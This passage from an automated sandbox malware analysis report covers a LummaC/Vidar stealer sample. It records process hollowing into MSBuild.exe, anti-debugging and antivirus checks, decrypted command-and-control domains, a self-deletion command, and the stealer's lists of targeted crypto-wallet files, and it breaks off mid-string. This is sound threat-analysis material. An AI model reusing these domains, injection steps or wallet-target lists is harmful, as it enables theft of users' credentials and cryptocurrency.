Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0041D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_0041D016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0041D98C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_0041D98C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0042762E SetUnhandledExceptionFilter,	4_2_0042762E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8BB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_6C8BB66C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C8BB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_6C8BB1F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6CA6AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_6CA6AC62
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00AF74A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	13_2_00AF74A0
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00AFB5E6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_00AFB5E6
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00AF77C5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_00AF77C5
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00AF7952 SetUnhandledExceptionFilter,	13_2_00AF7952

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: file.exe PID: 3636, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 3832, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\file.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write			Jump to behavior
Source: C:\ProgramData\CBFCFBFBFB.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write			Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 4_2_0040F54A _memset,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,ResumeThread,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,

4_2_0040F54A

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\ProgramData\CBFCFBFBFB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A			Jump to behavior

LummaC encrypted strings found

Source: CBFCFBFBFB.exe	String found in binary or memory: questionsmw.stor
Source: CBFCFBFBFB.exe	String found in binary or memory: soldiefieop.site
Source: CBFCFBFBFB.exe	String found in binary or memory: mysterisop.site
Source: CBFCFBFBFB.exe	String found in binary or memory: absorptioniw.site
Source: CBFCFBFBFB.exe	String found in binary or memory: treatynreit.site
Source: CBFCFBFBFB.exe	String found in binary or memory: snarlypagowo.site
Source: CBFCFBFBFB.exe	String found in binary or memory: abnomalrkmu.site
Source: CBFCFBFBFB.exe	String found in binary or memory: chorusarorp.site

Searches for specific processes (likely to inject)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_004124A8 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		4_2_004124A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0041257F __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		4_2_0041257F

Writes to foreign memory regions

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 430000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43D000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 670000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 671000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 882008	Jump to behavior
Source: C:\ProgramData\CBFCFBFBFB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\ProgramData\CBFCFBFBFB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000	Jump to behavior
Source: C:\ProgramData\CBFCFBFBFB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 44B000	Jump to behavior
Source: C:\ProgramData\CBFCFBFBFB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 44E000	Jump to behavior
Source: C:\ProgramData\CBFCFBFBFB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 45E000	Jump to behavior
Source: C:\ProgramData\CBFCFBFBFB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 11BF008	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\ProgramData\CBFCFBFBFB.exe "C:\ProgramData\CBFCFBFBFB.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JJDBAEHIJKJK" & exit	Jump to behavior
Source: C:\ProgramData\CBFCFBFBFB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\ProgramData\CBFCFBFBFB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\ProgramData\CBFCFBFBFB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10	Jump to behavior

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00639076 cpuid

0_2_00639076

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_0062A0B0
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	0_2_0062A1B6
Source: C:\Users\user\Desktop\file.exe	Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,__calloc_crt,_free,	0_2_0065D2BB
Source: C:\Users\user\Desktop\file.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_0062A285
Source: C:\Users\user\Desktop\file.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	0_2_0065F44E
Source: C:\Users\user\Desktop\file.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	0_2_00629921
Source: C:\Users\user\Desktop\file.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,	0_2_00661928
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_00621A42
Source: C:\Users\user\Desktop\file.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_free,_free,_free,_free,_free,_free,_free,_free,_free,	0_2_00662A18
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_00629BC3
Source: C:\Users\user\Desktop\file.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,	0_2_00661C46
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_00629C0E
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_00629CA9
Source: C:\Users\user\Desktop\file.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	0_2_00660C9C
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_00629D34
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	0_2_00621EEC
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	0_2_00629F87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	4_2_00410DDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	4_2_0042B0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	4_2_0042B1C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	4_2_00429A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	4_2_0042B268
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	4_2_0042B2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	4_2_0042AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	4_2_004253E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	4_2_0042B494
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	4_2_0042749C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: EnumSystemLocalesA,	4_2_0042B556
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	4_2_00429D6E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,	4_2_0042E56F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	4_2_00427576
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	4_2_00428DC4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	4_2_0042B5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	4_2_0042B580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	4_2_0042B623
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoA,	4_2_0042E6A4
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	13_2_00B0A0B0
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: GetLocaleInfoW,	13_2_00B0A1B6
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	13_2_00B0A285
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	13_2_00B09921
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: EnumSystemLocalesW,	13_2_00B01A42
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: EnumSystemLocalesW,	13_2_00B09BC3
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: EnumSystemLocalesW,	13_2_00B09CA9
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: EnumSystemLocalesW,	13_2_00B09C0E
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	13_2_00B09D34
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: GetLocaleInfoW,	13_2_00B01EEC
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: GetLocaleInfoW,	13_2_00B09F87

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_006176BF GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_006176BF

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 4_2_00410C53 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

4_2_00410C53

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 4_2_00410D2E GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

4_2_00410D2E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: Amcache.hve.7.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: MsMpEng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 0.2.file.exe.638ad8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.638ad8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 3636, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 3832, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: MSBuild.exe, 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: .,poloniex.,kraken.,okex.,binance.,bitfinex.,gdax.,ethereum.,exodus.,metamask.,myetherwallet.,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.\|150\|3\|windows,Program Files,Program Files (x86),AppData,ProgramData,.lnk,.exe,.scr,.com,.pif,.mp3\|DESKTOP\|%DESKTOP%\\|wallet.,seed.,btc.,key.,2fa.,crypto.,coin.,private.,2fa.,auth.,ledger.,trezor.,pass.,wal.,upbit.,bcex.,bithimb.,hitbtc.,bitflyer.,kucoin.,huobi.,poloniex.,kraken.,okex.,binance.,bitfinex.,gdax.,ethereum.,exodus.,metamask.,myetherwallet.,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.\|150\|2\|Windows,Program Files,Program Files (x86),AppData,ProgramData,.lnk,.exe,.scr,.com,.pif,.mp3\|
Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Electrum\wallets\
Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda 